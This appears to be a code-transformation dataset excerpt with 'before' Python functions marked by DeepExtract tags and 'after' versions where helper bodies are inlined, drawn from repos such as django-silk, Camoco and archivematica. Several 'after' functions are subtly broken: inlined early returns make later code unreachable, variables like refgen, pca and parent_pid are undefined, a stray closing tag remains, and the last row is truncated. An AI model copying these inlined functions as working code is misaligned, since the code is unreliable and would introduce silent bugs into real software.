before
stringlengths 0
955k
| after
stringlengths 0
877k
| repo
stringlengths 1
74
| type
stringclasses 1
value |
|---|---|---|---|
def _cv_ml(self):
<DeepExtract>
X_dist = norm_along_axis_1(self.X_train, self.X_train, norm_dim=True)
avg_num_neighbors = np.mean(np.ma.masked_where(X_dist > self.epsilon, X_dist).count(axis=1)) - 1
bw = 1.06 * self.y_std * avg_num_neighbors ** (-1.0 / (4 + self.ndim_y))
</DeepExtract>
x0 = np.concatenate([bw, np.array([self.epsilon])], axis=0)
def loologli(x):
assert x.shape[0] == self.ndim_y + 1
bw = x[:self.ndim_y]
eps = float(x[self.ndim_y])
return -self.loo_likelihood(bw, epsilon=eps)
x_opt = optimize.fmin(loologli, x0=x0, maxiter=_MAX_ITER_CV_ML_OPTIMIZER, disp=0)
(bw_opt, eps_opt) = (x_opt[:self.ndim_y], x_opt[self.ndim_y])
return (bw_opt, eps_opt)
|
def _cv_ml(self):
X_dist = norm_along_axis_1(self.X_train, self.X_train, norm_dim=True)
avg_num_neighbors = np.mean(np.ma.masked_where(X_dist > self.epsilon, X_dist).count(axis=1)) - 1
bw = 1.06 * self.y_std * avg_num_neighbors ** (-1.0 / (4 + self.ndim_y))
x0 = np.concatenate([bw, np.array([self.epsilon])], axis=0)
def loologli(x):
assert x.shape[0] == self.ndim_y + 1
bw = x[:self.ndim_y]
eps = float(x[self.ndim_y])
return -self.loo_likelihood(bw, epsilon=eps)
x_opt = optimize.fmin(loologli, x0=x0, maxiter=_MAX_ITER_CV_ML_OPTIMIZER, disp=0)
(bw_opt, eps_opt) = (x_opt[:self.ndim_y], x_opt[self.ndim_y])
return (bw_opt, eps_opt)
|
Conditional_Density_Estimation
|
positive
|
@force_fp32(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))
def loss(self, cls_scores, bbox_preds, centernesses, gt_bboxes, gt_labels, img_metas, cfg, gt_bboxes_ignore=None):
assert len(cls_scores) == len(bbox_preds) == len(centernesses)
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
<DeepExtract>
mlvl_points = []
for i in range(len(featmap_sizes)):
mlvl_points.append(self.get_points_single(featmap_sizes[i], self.strides[i], bbox_preds[0].dtype, bbox_preds[0].device))
all_level_points = mlvl_points
</DeepExtract>
<DeepExtract>
assert len(all_level_points) == len(self.regress_ranges)
num_levels = len(all_level_points)
expanded_regress_ranges = [all_level_points[i].new_tensor(self.regress_ranges[i])[None].expand_as(all_level_points[i]) for i in range(num_levels)]
concat_regress_ranges = torch.cat(expanded_regress_ranges, dim=0)
concat_points = torch.cat(all_level_points, dim=0)
num_points = [center.size(0) for center in all_level_points]
(labels_list, bbox_targets_list) = multi_apply(self.fcos_target_single, gt_bboxes, gt_labels, points=concat_points, regress_ranges=concat_regress_ranges, num_points_per_lvl=num_points)
labels_list = [labels.split(num_points, 0) for labels in labels_list]
bbox_targets_list = [bbox_targets.split(num_points, 0) for bbox_targets in bbox_targets_list]
concat_lvl_labels = []
concat_lvl_bbox_targets = []
for i in range(num_levels):
concat_lvl_labels.append(torch.cat([labels[i] for labels in labels_list]))
concat_lvl_bbox_targets.append(torch.cat([bbox_targets[i] for bbox_targets in bbox_targets_list]))
(labels, bbox_targets) = (concat_lvl_labels, concat_lvl_bbox_targets)
</DeepExtract>
num_imgs = cls_scores[0].size(0)
flatten_cls_scores = [cls_score.permute(0, 2, 3, 1).reshape(-1, self.cls_out_channels) for cls_score in cls_scores]
flatten_bbox_preds = [bbox_pred.permute(0, 2, 3, 1).reshape(-1, 4) for bbox_pred in bbox_preds]
flatten_centerness = [centerness.permute(0, 2, 3, 1).reshape(-1) for centerness in centernesses]
flatten_cls_scores = torch.cat(flatten_cls_scores)
flatten_bbox_preds = torch.cat(flatten_bbox_preds)
flatten_centerness = torch.cat(flatten_centerness)
flatten_labels = torch.cat(labels)
flatten_bbox_targets = torch.cat(bbox_targets)
flatten_points = torch.cat([points.repeat(num_imgs, 1) for points in all_level_points])
pos_inds = flatten_labels.nonzero().reshape(-1)
num_pos = len(pos_inds)
loss_cls = self.loss_cls(flatten_cls_scores, flatten_labels, avg_factor=num_pos + num_imgs)
pos_bbox_preds = flatten_bbox_preds[pos_inds]
pos_centerness = flatten_centerness[pos_inds]
if num_pos > 0:
pos_bbox_targets = flatten_bbox_targets[pos_inds]
<DeepExtract>
left_right = pos_bbox_targets[:, [0, 2]]
top_bottom = pos_bbox_targets[:, [1, 3]]
centerness_targets = left_right.min(dim=-1)[0] / left_right.max(dim=-1)[0] * (top_bottom.min(dim=-1)[0] / top_bottom.max(dim=-1)[0])
pos_centerness_targets = torch.sqrt(centerness_targets)
</DeepExtract>
pos_points = flatten_points[pos_inds]
pos_decoded_bbox_preds = distance2bbox(pos_points, pos_bbox_preds)
pos_decoded_target_preds = distance2bbox(pos_points, pos_bbox_targets)
loss_bbox = self.loss_bbox(pos_decoded_bbox_preds, pos_decoded_target_preds, weight=pos_centerness_targets, avg_factor=pos_centerness_targets.sum())
loss_centerness = self.loss_centerness(pos_centerness, pos_centerness_targets)
else:
loss_bbox = pos_bbox_preds.sum()
loss_centerness = pos_centerness.sum()
return dict(loss_cls=loss_cls, loss_bbox=loss_bbox, loss_centerness=loss_centerness)
|
@force_fp32(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))
def loss(self, cls_scores, bbox_preds, centernesses, gt_bboxes, gt_labels, img_metas, cfg, gt_bboxes_ignore=None):
assert len(cls_scores) == len(bbox_preds) == len(centernesses)
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
mlvl_points = []
for i in range(len(featmap_sizes)):
mlvl_points.append(self.get_points_single(featmap_sizes[i], self.strides[i], bbox_preds[0].dtype, bbox_preds[0].device))
all_level_points = mlvl_points
assert len(all_level_points) == len(self.regress_ranges)
num_levels = len(all_level_points)
expanded_regress_ranges = [all_level_points[i].new_tensor(self.regress_ranges[i])[None].expand_as(all_level_points[i]) for i in range(num_levels)]
concat_regress_ranges = torch.cat(expanded_regress_ranges, dim=0)
concat_points = torch.cat(all_level_points, dim=0)
num_points = [center.size(0) for center in all_level_points]
(labels_list, bbox_targets_list) = multi_apply(self.fcos_target_single, gt_bboxes, gt_labels, points=concat_points, regress_ranges=concat_regress_ranges, num_points_per_lvl=num_points)
labels_list = [labels.split(num_points, 0) for labels in labels_list]
bbox_targets_list = [bbox_targets.split(num_points, 0) for bbox_targets in bbox_targets_list]
concat_lvl_labels = []
concat_lvl_bbox_targets = []
for i in range(num_levels):
concat_lvl_labels.append(torch.cat([labels[i] for labels in labels_list]))
concat_lvl_bbox_targets.append(torch.cat([bbox_targets[i] for bbox_targets in bbox_targets_list]))
(labels, bbox_targets) = (concat_lvl_labels, concat_lvl_bbox_targets)
num_imgs = cls_scores[0].size(0)
flatten_cls_scores = [cls_score.permute(0, 2, 3, 1).reshape(-1, self.cls_out_channels) for cls_score in cls_scores]
flatten_bbox_preds = [bbox_pred.permute(0, 2, 3, 1).reshape(-1, 4) for bbox_pred in bbox_preds]
flatten_centerness = [centerness.permute(0, 2, 3, 1).reshape(-1) for centerness in centernesses]
flatten_cls_scores = torch.cat(flatten_cls_scores)
flatten_bbox_preds = torch.cat(flatten_bbox_preds)
flatten_centerness = torch.cat(flatten_centerness)
flatten_labels = torch.cat(labels)
flatten_bbox_targets = torch.cat(bbox_targets)
flatten_points = torch.cat([points.repeat(num_imgs, 1) for points in all_level_points])
pos_inds = flatten_labels.nonzero().reshape(-1)
num_pos = len(pos_inds)
loss_cls = self.loss_cls(flatten_cls_scores, flatten_labels, avg_factor=num_pos + num_imgs)
pos_bbox_preds = flatten_bbox_preds[pos_inds]
pos_centerness = flatten_centerness[pos_inds]
if num_pos > 0:
pos_bbox_targets = flatten_bbox_targets[pos_inds]
left_right = pos_bbox_targets[:, [0, 2]]
top_bottom = pos_bbox_targets[:, [1, 3]]
centerness_targets = left_right.min(dim=-1)[0] / left_right.max(dim=-1)[0] * (top_bottom.min(dim=-1)[0] / top_bottom.max(dim=-1)[0])
pos_centerness_targets = torch.sqrt(centerness_targets)
pos_points = flatten_points[pos_inds]
pos_decoded_bbox_preds = distance2bbox(pos_points, pos_bbox_preds)
pos_decoded_target_preds = distance2bbox(pos_points, pos_bbox_targets)
loss_bbox = self.loss_bbox(pos_decoded_bbox_preds, pos_decoded_target_preds, weight=pos_centerness_targets, avg_factor=pos_centerness_targets.sum())
loss_centerness = self.loss_centerness(pos_centerness, pos_centerness_targets)
else:
loss_bbox = pos_bbox_preds.sum()
loss_centerness = pos_centerness.sum()
return dict(loss_cls=loss_cls, loss_bbox=loss_bbox, loss_centerness=loss_centerness)
|
Dense-RepPoints
|
positive
|
@torch.no_grad()
def test(data_set, backbone, batch_size, nfolds=10):
print('testing verification..')
data_list = data_set[0]
issame_list = data_set[1]
embeddings_list = []
time_consumed = 0.0
for i in range(len(data_list)):
data = data_list[i]
embeddings = None
ba = 0
while ba < data.shape[0]:
bb = min(ba + batch_size, data.shape[0])
count = bb - ba
_data = data[bb - batch_size:bb]
time0 = datetime.datetime.now()
img = (_data / 255 - 0.5) / 0.5
net_out = backbone(img)
_embeddings = net_out.detach().cpu().numpy()
time_now = datetime.datetime.now()
diff = time_now - time0
time_consumed += diff.total_seconds()
if embeddings is None:
embeddings = np.zeros((data.shape[0], _embeddings.shape[1]))
embeddings[ba:bb, :] = _embeddings[batch_size - count:, :]
ba = bb
embeddings_list.append(embeddings)
_xnorm = 0.0
_xnorm_cnt = 0
for embed in embeddings_list:
for i in range(embed.shape[0]):
_em = embed[i]
_norm = np.linalg.norm(_em)
_xnorm += _norm
_xnorm_cnt += 1
_xnorm /= _xnorm_cnt
embeddings = embeddings_list[0].copy()
embeddings = sklearn.preprocessing.normalize(embeddings)
acc1 = 0.0
std1 = 0.0
embeddings = embeddings_list[0] + embeddings_list[1]
embeddings = sklearn.preprocessing.normalize(embeddings)
print(embeddings.shape)
print('infer time', time_consumed)
<DeepExtract>
thresholds = np.arange(0, 4, 0.01)
embeddings1 = embeddings[0::2]
embeddings2 = embeddings[1::2]
(tpr, fpr, accuracy, best_thresholds, bad_case) = calculate_roc(thresholds, embeddings1, embeddings2, np.asarray(issame_list), nrof_folds=nfolds, pca=pca)
(_, _, accuracy, val, val_std, far) = (tpr, fpr, accuracy, best_thresholds, bad_case)
</DeepExtract>
(acc2, std2) = (np.mean(accuracy), np.std(accuracy))
return (acc1, std1, acc2, std2, _xnorm, embeddings_list)
|
@torch.no_grad()
def test(data_set, backbone, batch_size, nfolds=10):
print('testing verification..')
data_list = data_set[0]
issame_list = data_set[1]
embeddings_list = []
time_consumed = 0.0
for i in range(len(data_list)):
data = data_list[i]
embeddings = None
ba = 0
while ba < data.shape[0]:
bb = min(ba + batch_size, data.shape[0])
count = bb - ba
_data = data[bb - batch_size:bb]
time0 = datetime.datetime.now()
img = (_data / 255 - 0.5) / 0.5
net_out = backbone(img)
_embeddings = net_out.detach().cpu().numpy()
time_now = datetime.datetime.now()
diff = time_now - time0
time_consumed += diff.total_seconds()
if embeddings is None:
embeddings = np.zeros((data.shape[0], _embeddings.shape[1]))
embeddings[ba:bb, :] = _embeddings[batch_size - count:, :]
ba = bb
embeddings_list.append(embeddings)
_xnorm = 0.0
_xnorm_cnt = 0
for embed in embeddings_list:
for i in range(embed.shape[0]):
_em = embed[i]
_norm = np.linalg.norm(_em)
_xnorm += _norm
_xnorm_cnt += 1
_xnorm /= _xnorm_cnt
embeddings = embeddings_list[0].copy()
embeddings = sklearn.preprocessing.normalize(embeddings)
acc1 = 0.0
std1 = 0.0
embeddings = embeddings_list[0] + embeddings_list[1]
embeddings = sklearn.preprocessing.normalize(embeddings)
print(embeddings.shape)
print('infer time', time_consumed)
thresholds = np.arange(0, 4, 0.01)
embeddings1 = embeddings[0::2]
embeddings2 = embeddings[1::2]
(tpr, fpr, accuracy, best_thresholds, bad_case) = calculate_roc(thresholds, embeddings1, embeddings2, np.asarray(issame_list), nrof_folds=nfolds, pca=pca)
(_, _, accuracy, val, val_std, far) = (tpr, fpr, accuracy, best_thresholds, bad_case)
(acc2, std2) = (np.mean(accuracy), np.std(accuracy))
return (acc1, std1, acc2, std2, _xnorm, embeddings_list)
|
cavaface.pytorch
|
positive
|
@classmethod
def from_DataFrame(cls, df, name, description, chrom_col='chrom', start_col='start', stop_col='stop', id_col='ID'):
"""
Imports a RefGen object from a CSV.
"""
self = cls.create(name, description, type='RefGen')
genes = list()
for (i, row) in df.iterrows():
genes.append(Gene(row[chrom_col], int(row[start_col]), int(row[stop_col]), id=row[id_col]).update(dict(row.items())))
<DeepExtract>
if isinstance(genes, Locus):
self.db.cursor().execute('\n INSERT OR REPLACE INTO genes VALUES (?,?,?,?)\n ', (genes.name, genes.chrom, genes.start, genes.end))
self.db.cursor().executemany('\n INSERT OR REPLACE INTO gene_attrs VALUES (?,?,?)\n ', [(genes.id, key, val) for (key, val) in genes.attr.items()])
if refgen:
aliases = refgen.aliases(genes.id)
if aliases:
self.db.cursor().executemany('\n INSERT OR IGNORE INTO aliases VALUES (?,?)', [(al, id) for al in aliases])
else:
genes = list(genes)
self.log('Adding {} Genes info to database'.format(len(genes)))
cur = self.db.cursor()
cur.execute('BEGIN TRANSACTION')
cur.executemany('INSERT OR REPLACE INTO genes VALUES (?,?,?,?)', ((genes.name, genes.chrom, genes.start, genes.end) for genes in genes))
self.log('Adding Gene attr info to database')
cur.executemany('INSERT OR REPLACE INTO gene_attrs VALUES (?,?,?)', ((genes.id, key, val) for genes in genes for (key, val) in genes.attr.items()))
if refgen:
al_map = refgen.aliases([genes.id for genes in genes])
als = []
for (id, al_list) in al_map.items():
for al in al_list:
als.append([al, id])
cur.executemany('INSERT OR REPLACE INTO aliases VALUES (?,?)', als)
cur.execute('END TRANSACTION')
</DeepExtract>
<DeepExtract>
self.log('Building Indices')
cur = self.db.cursor()
cur.execute('\n CREATE INDEX IF NOT EXISTS gene_start_end ON genes (chromosome,start DESC, end ASC, id);\n CREATE INDEX IF NOT EXISTS gene_end_start ON genes (chromosome,end DESC,start DESC,id);\n CREATE INDEX IF NOT EXISTS gene_start ON genes (chromosome,start);\n CREATE INDEX IF NOT EXISTS gene_end ON genes (chromosome,end);\n CREATE INDEX IF NOT EXISTS geneid ON genes (id);\n CREATE INDEX IF NOT EXISTS geneattr ON gene_attrs (id);\n CREATE INDEX IF NOT EXISTS id ON func(id);\n CREATE INDEX IF NOT EXISTS id ON ortho_func(id);\n ')
</DeepExtract>
return self
|
@classmethod
def from_DataFrame(cls, df, name, description, chrom_col='chrom', start_col='start', stop_col='stop', id_col='ID'):
"""
Imports a RefGen object from a CSV.
"""
self = cls.create(name, description, type='RefGen')
genes = list()
for (i, row) in df.iterrows():
genes.append(Gene(row[chrom_col], int(row[start_col]), int(row[stop_col]), id=row[id_col]).update(dict(row.items())))
if isinstance(genes, Locus):
self.db.cursor().execute('\n INSERT OR REPLACE INTO genes VALUES (?,?,?,?)\n ', (genes.name, genes.chrom, genes.start, genes.end))
self.db.cursor().executemany('\n INSERT OR REPLACE INTO gene_attrs VALUES (?,?,?)\n ', [(genes.id, key, val) for (key, val) in genes.attr.items()])
if refgen:
aliases = refgen.aliases(genes.id)
if aliases:
self.db.cursor().executemany('\n INSERT OR IGNORE INTO aliases VALUES (?,?)', [(al, id) for al in aliases])
else:
genes = list(genes)
self.log('Adding {} Genes info to database'.format(len(genes)))
cur = self.db.cursor()
cur.execute('BEGIN TRANSACTION')
cur.executemany('INSERT OR REPLACE INTO genes VALUES (?,?,?,?)', ((genes.name, genes.chrom, genes.start, genes.end) for genes in genes))
self.log('Adding Gene attr info to database')
cur.executemany('INSERT OR REPLACE INTO gene_attrs VALUES (?,?,?)', ((genes.id, key, val) for genes in genes for (key, val) in genes.attr.items()))
if refgen:
al_map = refgen.aliases([genes.id for genes in genes])
als = []
for (id, al_list) in al_map.items():
for al in al_list:
als.append([al, id])
cur.executemany('INSERT OR REPLACE INTO aliases VALUES (?,?)', als)
cur.execute('END TRANSACTION')
self.log('Building Indices')
cur = self.db.cursor()
cur.execute('\n CREATE INDEX IF NOT EXISTS gene_start_end ON genes (chromosome,start DESC, end ASC, id);\n CREATE INDEX IF NOT EXISTS gene_end_start ON genes (chromosome,end DESC,start DESC,id);\n CREATE INDEX IF NOT EXISTS gene_start ON genes (chromosome,start);\n CREATE INDEX IF NOT EXISTS gene_end ON genes (chromosome,end);\n CREATE INDEX IF NOT EXISTS geneid ON genes (id);\n CREATE INDEX IF NOT EXISTS geneattr ON gene_attrs (id);\n CREATE INDEX IF NOT EXISTS id ON func(id);\n CREATE INDEX IF NOT EXISTS id ON ortho_func(id);\n ')
return self
|
Camoco
|
positive
|
def pretty_print_config_to_json(self, services, hostname=None):
"""Description of a protorpc.remote.Service in API format.
Args:
services: Either a single protorpc.remote.Service or a list of them
that implements an api/version.
hostname: string, Hostname of the API, to override the value set on the
current service. Defaults to None.
Returns:
string, The API descriptor document as JSON.
"""
if not isinstance(services, (tuple, list)):
services = [services]
<DeepExtract>
if services is None:
if not False:
raise TypeError('%s is None, which is not allowed.' % 'services')
return services
if not isinstance(services, (tuple, list)):
raise TypeError('%s is not a list.' % 'services')
if not all((isinstance(i, remote._ServiceClass) for i in services)):
type_list = list(set((type(setting) for setting in services)))
raise TypeError("%s contains types that don't match %s: %s" % ('services', remote._ServiceClass.__name__, type_list))
return services
</DeepExtract>
<DeepExtract>
merged_api_info = self.__get_merged_api_info(services)
descriptor = self.get_descriptor_defaults(merged_api_info, hostname=hostname)
description = merged_api_info.description
if not description and len(services) == 1:
description = services[0].__doc__
if description:
descriptor['description'] = description
auth_descriptor = self.__auth_descriptor(merged_api_info)
if auth_descriptor:
descriptor['auth'] = auth_descriptor
frontend_limit_descriptor = self.__frontend_limit_descriptor(merged_api_info)
if frontend_limit_descriptor:
descriptor['frontendLimits'] = frontend_limit_descriptor
method_map = {}
method_collision_tracker = {}
rest_collision_tracker = {}
for service in services:
remote_methods = service.all_remote_methods()
for (protorpc_meth_name, protorpc_meth_info) in remote_methods.iteritems():
method_info = getattr(protorpc_meth_info, 'method_info', None)
if method_info is None:
continue
method_id = method_info.method_id(service.api_info)
self.__id_from_name[protorpc_meth_name] = method_id
method_map[method_id] = self.__method_descriptor(service, service.__name__, method_info, protorpc_meth_name, protorpc_meth_info)
if method_id in method_collision_tracker:
raise ApiConfigurationError('Method %s used multiple times, in classes %s and %s' % (method_id, method_collision_tracker[method_id], service.__name__))
else:
method_collision_tracker[method_id] = service.__name__
rest_identifier = (method_info.http_method, method_info.get_path(service.api_info))
if rest_identifier in rest_collision_tracker:
raise ApiConfigurationError('%s path "%s" used multiple times, in classes %s and %s' % (method_info.http_method, method_info.get_path(service.api_info), rest_collision_tracker[rest_identifier], service.__name__))
else:
rest_collision_tracker[rest_identifier] = service.__name__
if method_map:
descriptor['methods'] = method_map
descriptor['descriptor'] = self.__schema_descriptor(services)
descriptor = descriptor
</DeepExtract>
return json.dumps(descriptor, sort_keys=True, indent=2)
|
def pretty_print_config_to_json(self, services, hostname=None):
"""Description of a protorpc.remote.Service in API format.
Args:
services: Either a single protorpc.remote.Service or a list of them
that implements an api/version.
hostname: string, Hostname of the API, to override the value set on the
current service. Defaults to None.
Returns:
string, The API descriptor document as JSON.
"""
if not isinstance(services, (tuple, list)):
services = [services]
if services is None:
if not False:
raise TypeError('%s is None, which is not allowed.' % 'services')
return services
if not isinstance(services, (tuple, list)):
raise TypeError('%s is not a list.' % 'services')
if not all((isinstance(i, remote._ServiceClass) for i in services)):
type_list = list(set((type(setting) for setting in services)))
raise TypeError("%s contains types that don't match %s: %s" % ('services', remote._ServiceClass.__name__, type_list))
return services
merged_api_info = self.__get_merged_api_info(services)
descriptor = self.get_descriptor_defaults(merged_api_info, hostname=hostname)
description = merged_api_info.description
if not description and len(services) == 1:
description = services[0].__doc__
if description:
descriptor['description'] = description
auth_descriptor = self.__auth_descriptor(merged_api_info)
if auth_descriptor:
descriptor['auth'] = auth_descriptor
frontend_limit_descriptor = self.__frontend_limit_descriptor(merged_api_info)
if frontend_limit_descriptor:
descriptor['frontendLimits'] = frontend_limit_descriptor
method_map = {}
method_collision_tracker = {}
rest_collision_tracker = {}
for service in services:
remote_methods = service.all_remote_methods()
for (protorpc_meth_name, protorpc_meth_info) in remote_methods.iteritems():
method_info = getattr(protorpc_meth_info, 'method_info', None)
if method_info is None:
continue
method_id = method_info.method_id(service.api_info)
self.__id_from_name[protorpc_meth_name] = method_id
method_map[method_id] = self.__method_descriptor(service, service.__name__, method_info, protorpc_meth_name, protorpc_meth_info)
if method_id in method_collision_tracker:
raise ApiConfigurationError('Method %s used multiple times, in classes %s and %s' % (method_id, method_collision_tracker[method_id], service.__name__))
else:
method_collision_tracker[method_id] = service.__name__
rest_identifier = (method_info.http_method, method_info.get_path(service.api_info))
if rest_identifier in rest_collision_tracker:
raise ApiConfigurationError('%s path "%s" used multiple times, in classes %s and %s' % (method_info.http_method, method_info.get_path(service.api_info), rest_collision_tracker[rest_identifier], service.__name__))
else:
rest_collision_tracker[rest_identifier] = service.__name__
if method_map:
descriptor['methods'] = method_map
descriptor['descriptor'] = self.__schema_descriptor(services)
descriptor = descriptor
return json.dumps(descriptor, sort_keys=True, indent=2)
|
AndroidGCMTutorial
|
positive
|
def generate_vis_amp_time_series(df, sourL='def', polarL=['RR', 'LL'], exptL='def', out_path='def', min_elem=200):
from eat.inspect import closures as cl
import os
if out_path == 'def':
out_path = 'Closures_timeseries/'
if not os.path.exists(out_path):
os.makedirs(out_path)
if sourL == 'def':
sourL = list(df.source.unique())
if exptL == 'def':
exptL = list(df.expt_no.unique())
if 'band' not in df.columns:
df['band'] = ''
bandL = list(df.band.unique())
if 'mjd' not in df.columns:
<DeepExtract>
df['mjd'] = Time(list(df.datetime)).mjd
df = df
</DeepExtract>
baseL = list(df.baseline.unique())
amp_path = out_path + 'AMP/'
if not os.path.exists(amp_path):
os.makedirs(amp_path)
for sour in sourL:
for expt in exptL:
for band in bandL:
for polar in polarL:
foo = df
for base in baseL:
foo2 = foo[(foo.source == sour) & (foo.polarization == polar) & (foo.expt_no == expt) & (foo.band == band) & (foo.baseline == base)]
if np.shape(foo2)[0] > min_elem:
namef = 'amp_pha_' + base + '_' + sour + '_' + polar + '_' + band + '.txt'
print(namef)
print(np.shape(foo2)[0], [np.min(foo2.mjd), np.max(foo2.mjd)])
foo3 = foo2[['mjd', 'amp', 'phase', 'sigma']]
foo3.to_csv(amp_path + namef, sep=' ', index=False, header=False)
|
def generate_vis_amp_time_series(df, sourL='def', polarL=['RR', 'LL'], exptL='def', out_path='def', min_elem=200):
from eat.inspect import closures as cl
import os
if out_path == 'def':
out_path = 'Closures_timeseries/'
if not os.path.exists(out_path):
os.makedirs(out_path)
if sourL == 'def':
sourL = list(df.source.unique())
if exptL == 'def':
exptL = list(df.expt_no.unique())
if 'band' not in df.columns:
df['band'] = ''
bandL = list(df.band.unique())
if 'mjd' not in df.columns:
df['mjd'] = Time(list(df.datetime)).mjd
df = df
baseL = list(df.baseline.unique())
amp_path = out_path + 'AMP/'
if not os.path.exists(amp_path):
os.makedirs(amp_path)
for sour in sourL:
for expt in exptL:
for band in bandL:
for polar in polarL:
foo = df
for base in baseL:
foo2 = foo[(foo.source == sour) & (foo.polarization == polar) & (foo.expt_no == expt) & (foo.band == band) & (foo.baseline == base)]
if np.shape(foo2)[0] > min_elem:
namef = 'amp_pha_' + base + '_' + sour + '_' + polar + '_' + band + '.txt'
print(namef)
print(np.shape(foo2)[0], [np.min(foo2.mjd), np.max(foo2.mjd)])
foo3 = foo2[['mjd', 'amp', 'phase', 'sigma']]
foo3.to_csv(amp_path + namef, sep=' ', index=False, header=False)
|
eat
|
positive
|
def mets_event(digiprov_id, event_type, event_detail='', event_outcome_detail_note='', agent_type='storage service', agent_value=None):
"""
Create and return a PREMIS:EVENT.
"""
now = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
if agent_value is None:
<DeepExtract>
agent_value = 'Archivematica Storage Service-%s' % ss_version
</DeepExtract>
EP = ElementMaker(namespace=NSMAP['premis'], nsmap={'premis': NSMAP['premis']})
EM = ElementMaker(namespace=NSMAP['mets'], nsmap={'mets': NSMAP['mets']})
premis_event = EP.event(EP.eventIdentifier(EP.eventIdentifierType('UUID'), EP.eventIdentifierValue(str(uuid.uuid4()))), EP.eventType(event_type), EP.eventDateTime(now), EP.eventDetail(event_detail), EP.eventOutcomeInformation(EP.eventOutcome(), EP.eventOutcomeDetail(EP.eventOutcomeDetailNote(event_outcome_detail_note))), EP.linkingAgentIdentifier(EP.linkingAgentIdentifierType(agent_type), EP.linkingAgentIdentifierValue(agent_value)), version='2.2')
premis_event.set('{' + NSMAP['xsi'] + '}schemaLocation', 'info:lc/xmlns/premis-v2 http://www.loc.gov/standards/premis/v2/premis-v2-2.xsd')
digiprov_event = EM.digiprovMD(EM.mdWrap(EM.xmlData(premis_event), MDTYPE='PREMIS:EVENT'), ID=digiprov_id)
return digiprov_event
|
def mets_event(digiprov_id, event_type, event_detail='', event_outcome_detail_note='', agent_type='storage service', agent_value=None):
"""
Create and return a PREMIS:EVENT.
"""
now = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
if agent_value is None:
agent_value = 'Archivematica Storage Service-%s' % ss_version
EP = ElementMaker(namespace=NSMAP['premis'], nsmap={'premis': NSMAP['premis']})
EM = ElementMaker(namespace=NSMAP['mets'], nsmap={'mets': NSMAP['mets']})
premis_event = EP.event(EP.eventIdentifier(EP.eventIdentifierType('UUID'), EP.eventIdentifierValue(str(uuid.uuid4()))), EP.eventType(event_type), EP.eventDateTime(now), EP.eventDetail(event_detail), EP.eventOutcomeInformation(EP.eventOutcome(), EP.eventOutcomeDetail(EP.eventOutcomeDetailNote(event_outcome_detail_note))), EP.linkingAgentIdentifier(EP.linkingAgentIdentifierType(agent_type), EP.linkingAgentIdentifierValue(agent_value)), version='2.2')
premis_event.set('{' + NSMAP['xsi'] + '}schemaLocation', 'info:lc/xmlns/premis-v2 http://www.loc.gov/standards/premis/v2/premis-v2-2.xsd')
digiprov_event = EM.digiprovMD(EM.mdWrap(EM.xmlData(premis_event), MDTYPE='PREMIS:EVENT'), ID=digiprov_id)
return digiprov_event
|
archivematica-storage-service
|
positive
|
def process_response(self, request, response):
if getattr(request, 'silk_is_intercepted', False):
while True:
try:
<DeepExtract>
Logger.debug('Process response')
with silk_meta_profiler():
collector = DataCollector()
collector.stop_python_profiler()
silk_request = collector.request
if silk_request:
ResponseModelFactory(response).construct_response_model()
silk_request.end_time = timezone.now()
collector.finalise()
else:
Logger.error('No request model was available when processing response. Did something go wrong in process_request/process_view?\n' + str(request) + '\n\n' + str(response))
if silk_request:
silk_request.save()
Logger.debug('Process response done.')
</DeepExtract>
except (AttributeError, DatabaseError):
Logger.debug('Retrying _process_response')
<DeepExtract>
Logger.debug('Process response')
with silk_meta_profiler():
collector = DataCollector()
collector.stop_python_profiler()
silk_request = collector.request
if silk_request:
ResponseModelFactory(response).construct_response_model()
silk_request.end_time = timezone.now()
collector.finalise()
else:
Logger.error('No request model was available when processing response. Did something go wrong in process_request/process_view?\n' + str(request) + '\n\n' + str(response))
if silk_request:
silk_request.save()
Logger.debug('Process response done.')
</DeepExtract>
finally:
break
return response
|
def process_response(self, request, response):
if getattr(request, 'silk_is_intercepted', False):
while True:
try:
Logger.debug('Process response')
with silk_meta_profiler():
collector = DataCollector()
collector.stop_python_profiler()
silk_request = collector.request
if silk_request:
ResponseModelFactory(response).construct_response_model()
silk_request.end_time = timezone.now()
collector.finalise()
else:
Logger.error('No request model was available when processing response. Did something go wrong in process_request/process_view?\n' + str(request) + '\n\n' + str(response))
if silk_request:
silk_request.save()
Logger.debug('Process response done.')
except (AttributeError, DatabaseError):
Logger.debug('Retrying _process_response')
Logger.debug('Process response')
with silk_meta_profiler():
collector = DataCollector()
collector.stop_python_profiler()
silk_request = collector.request
if silk_request:
ResponseModelFactory(response).construct_response_model()
silk_request.end_time = timezone.now()
collector.finalise()
else:
Logger.error('No request model was available when processing response. Did something go wrong in process_request/process_view?\n' + str(request) + '\n\n' + str(response))
if silk_request:
silk_request.save()
Logger.debug('Process response done.')
finally:
break
return response
|
django-silk
|
positive
|
def commandTroops():
for (index, friend) in enumerate(hero.findFriends()):
if friend.type == 'paladin':
<DeepExtract>
if friend.canCast('heal'):
if hero.health < hero.maxHealth * 0.6:
target = self
if target:
hero.command(friend, 'cast', 'heal', target)
else:
target = hero.findNearestEnemy()
hero.command(friend, 'attack', target)
</DeepExtract>
elif friend.type == 'soldier' or friend.type == 'archer':
<DeepExtract>
target = hero.findNearestEnemy()
if target:
hero.command(friend, 'attack', target)
</DeepExtract>
|
def commandTroops():
for (index, friend) in enumerate(hero.findFriends()):
if friend.type == 'paladin':
if friend.canCast('heal'):
if hero.health < hero.maxHealth * 0.6:
target = self
if target:
hero.command(friend, 'cast', 'heal', target)
else:
target = hero.findNearestEnemy()
hero.command(friend, 'attack', target)
elif friend.type == 'soldier' or friend.type == 'archer':
target = hero.findNearestEnemy()
if target:
hero.command(friend, 'attack', target)
</DeepExtract>
|
CodeCombat
|
positive
|
def freeze_support():
"""
Run code for process object if this in not the main process
"""
if is_forking(sys.argv):
kwds = {}
for arg in sys.argv[2:]:
(name, value) = arg.split('=')
if value == 'None':
kwds[name] = None
else:
kwds[name] = int(value)
<DeepExtract>
assert is_forking(sys.argv)
if sys.platform == 'win32':
import msvcrt
from .reduction import steal_handle
new_handle = steal_handle(parent_pid, pipe_handle)
fd = msvcrt.open_osfhandle(new_handle, os.O_RDONLY)
else:
from . import semaphore_tracker
semaphore_tracker._semaphore_tracker._fd = tracker_fd
fd = pipe_handle
